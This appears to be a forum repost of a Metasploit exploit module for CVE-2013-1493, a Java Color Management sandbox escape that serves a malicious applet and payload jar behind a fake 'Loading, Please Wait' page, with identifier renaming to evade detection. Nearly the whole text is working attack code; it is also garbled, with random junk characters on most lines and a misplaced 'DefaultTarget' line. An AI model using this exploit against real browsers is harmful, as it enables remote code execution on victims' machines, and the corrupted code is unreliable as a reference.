##
. r) m+ }: }6 R) \1 R% Q! X' `( m! T5 V+ r0 ]- B! l
# This file is part of the Metasploit Framework and may be subject to: R1 D. P$ I) _& F
# redistribution and commercial restrictions. Please see the Metasploit, \* O: i' v( d- b8 R
# web site for more information on licensing and terms of use.7 R6 Y' L) G; [
# http://metasploit.com/4 z9 M1 o/ b7 V' s! X, f e# G
##
0 B+ T1 t! y) j' ^, c7 a. @require ‘msf/core’; C5 T( {4 C8 ^6 |1 O3 e- X; o& J
require ‘rex’2 K" {6 b( x/ F' }; l& C
class Metasploit3 < Msf::Exploit::Remote i3 w- C f4 `- Y
Rank = NormalRanking3 \! j3 w2 B: D
include Msf::Exploit::Remote::HttpServer::HTML
( P' @+ |6 {( ]: b% {' a2 ginclude Msf::Exploit::EXE
$ C0 p- y7 E! u+ K$ M% }& Oinclude Msf::Exploit::Remote::BrowserAutopwn
/ s5 S1 L8 U, Y( Z# nautopwn_info({ :javascript => false })
8 C+ y, f, s7 m1 Ydef initialize( info = {} )
6 {& w1 @" ]; Usuper( update_info( info,; J+ g8 L! n4 v
‘Name’ => ‘Java CMM Remote Code Execution’,7 w3 ]7 z K% s6 }) @8 @
‘Description’ => %q{, }( }7 j0 W( f$ \& o
This module abuses the Color Management classes from a Java Applet to run: c& X( N6 L3 b+ w& E" j& X% u* S3 p
arbitrary Java code outside of the sandbox as exploited in the wild in February" [: I$ D& f9 t* w3 K
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u410 O; i6 r/ [# P( x. B/ I
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
. T& \! i& y, `- K" u- b7 c rsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java$ v0 I! U I( ?9 P
warning in order to run the malicious applet.
* N. S# j% m$ V# ?3 v- o L3 |& b},
" R: \) ?# O; k‘License’ => MSF_LICENSE," W, p7 n3 }0 V" v" ]& x. l/ W
‘Author’ =>
2 x% ^7 S6 I# {' Z* e5 t: p/ o'Unknown', # Vulnerability discovery and Exploit! `- I) \1 |! z: Y* x) N! ?$ G8 I
'juan vazquez' # Metasploit module (just ported the published exploit)
1 b9 X; \; B; ]$ ^% H],' X- R! `; }. R& e
‘References’ =>/ E3 W, o" |& X7 {3 [
[
2 i- ]$ o: N. M+ n[ 'CVE', '2013-1493' ],
+ H' D8 C2 ]0 ]4 @[ 'OSVDB', '90737' ],: m+ E& ^! Y! ^7 t ?
[ 'BID', '58238' ],
" R* h* f) T% { F1 x[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
5 d$ A; z9 G/ P" T[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],/ Z: X* G) e# G3 d( S/ d& i
[ 'URL', 'http://pastie.org/pastes/6581034' ]
& h8 E1 P( j# q$ g# }, A],: B& n$ p5 S1 X3 v
‘Platform’ => [ 'win', 'java' ],/ l3 ]% D% H: ~' E7 |3 h, _6 j3 `- E2 g
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
9 V0 @2 j/ Y N& F3 Q+ L; \) L+ `‘Targets’ =>
6 U: ] g" |# |[
" g% W( |7 G& Z[ 'Generic (Java Payload)',$ w' I0 a- s! |
{$ a2 |: S; _# E |
'Platform' => 'java',
3 E3 j0 |0 f! x( w- l' K'Arch' => ARCH_JAVA/ E8 M! Z# W2 e6 {& t* a
}8 j0 V9 a# e; }; y R
],
9 X2 i: e! [1 k5 n' B! D2 _; a[ 'Windows x86 (Native Payload)',
+ n$ |! X" S& |& g# s9 E3 f/ K {9 G3 R{3 F7 [; _$ T% O$ C" q" |! N
'Platform' => 'win',
, }' N# m$ E3 u6 v; |* P7 d; O'Arch' => ARCH_X86
5 W8 P2 y! Q2 ^4 l% D; w+ @}
" p6 J9 f2 u7 u% Q K/ T, w* V]+ I( }; f; }4 d
],+ P+ j" P; g- b( M2 }* H
‘‘DisclosureDate’ => ‘Mar 01 2013′
0 C. u1 F1 K! x0 D7 l7 D* t))( R( p. e0 z; W9 W; T/ _
end3 t& P/ }& g) A
def setup% E0 ^7 X* j, H/ F. X! j+ B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)! m% P I( u3 a
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( r5 i" {/ h& \. u2 D) N# n+ t$ N
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
% C0 e) |* f3 M4 z2 m0 Z@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. O7 S% t7 y0 J- G- X
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”); `# ?. u* q0 N' Q
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) x8 E! t: S8 [& m4 Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
' {% l# ~# N. z( z# Y# l/ e2 y@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ x/ H! z! V8 h+ O( v6 |@init_class_name = rand_text_alpha(“Init”.length)
0 k( f! y6 Y* @" I" F@init_class.gsub!(“Init”, @init_class_name)
M! D. d0 ^) O" D7 G- M6 {super, \1 j+ n7 n, Q
end& ^' _) \! q {- E9 {
def on_request_uri(cli, request)
1 d. `: r9 h" M0 t8 Lprint_status(“handling request for #{request.uri}”), z9 R9 k2 R: X+ t% D
case request.uri) t2 }* N8 H3 y6 J
when /\.jar$/i% b) b" O9 ] X" l
jar = payload.encoded_jar
/ w! K w# t' Ejar.add_file(“#{@init_class_name}.class”, @init_class)
4 {& G9 W' r2 ^4 Vjar.add_file(“Leak.class”, @leak_class)
0 [ M( J" k" Q8 j& cjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
' r; | j, E( ^3 d5 fjar.add_file(“MyColorSpace.class”, @color_space_class)8 K# i0 |% x4 P( y
DefaultTarget’ => 1, ~& I" q! V+ P3 n6 y' F
metasploit_str = rand_text_alpha(“metasploit”.length)
v" C9 [% [' f/ rpayload_str = rand_text_alpha(“payload”.length)
& P( |/ t8 A# O2 D; e$ U6 njar.entries.each { |entry|5 {5 J0 e$ T2 h+ i" l2 m' v [7 ]
entry.name.gsub!(“metasploit”, metasploit_str)
0 _5 ]0 e( P9 g2 Uentry.name.gsub!(“Payload”, payload_str)+ W8 h/ J+ U' o# z2 J& P( J0 U" G
entry.data = entry.data.gsub(“metasploit”, metasploit_str): z- ?6 D$ q9 |7 b/ L; C1 t
entry.data = entry.data.gsub(“Payload”, payload_str)
" V( C9 I6 w- Y3 R6 y# g: ^}8 Q8 n% [9 ~' b5 N9 C
jar.build_manifest* T9 I( p% O- C+ g
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
* s. W0 m4 t: R, R V5 L' @8 N6 |when /\/$/2 _% \( k- C% q- w4 F6 q7 [9 n
payload = regenerate_payload(cli)$ j) I( E: t9 j' D
if not payload
; f5 ^. V6 Q8 z* y, q/ o% q6 W. Qprint_error(“Failed to generate the payload.”)3 i- } d: I% Y
send_not_found(cli)+ ]/ H |/ |1 R$ Q+ a6 i+ u
return- M5 ~0 ^* X9 x5 t
end
! }. Q: g) `% s8 gsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
9 X/ N, S2 Q: f6 zelse! I# @# v5 \. J% H; n: Z6 O
send_redirect(cli, get_resource() + ‘/’, ”)- Y+ o' D/ v: B2 J* c
end
" _4 B7 @. H# Fend
$ @$ ^/ s* n0 C3 R; Ddef generate_html) V+ v5 B! L3 k% c. y0 V
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
5 N$ \- _3 A8 o$ chtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
9 {. `+ V2 C6 [1 h6 whtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
' Z# ?, q% T5 m- }% T) X. e. @0 Rhtml += %Q|</applet></body></html>|
( B3 d) G7 U% F; R' c& wreturn html
6 s j2 W) @* x! w M1 xend
# Y$ A4 A6 u" S2 H* h$ D! ^end% _' y& F. U, @( T% }
end7 F5 G2 E2 j! G2 q
|
发表于 2013-4-4 17:31:17
收藏
支持
反对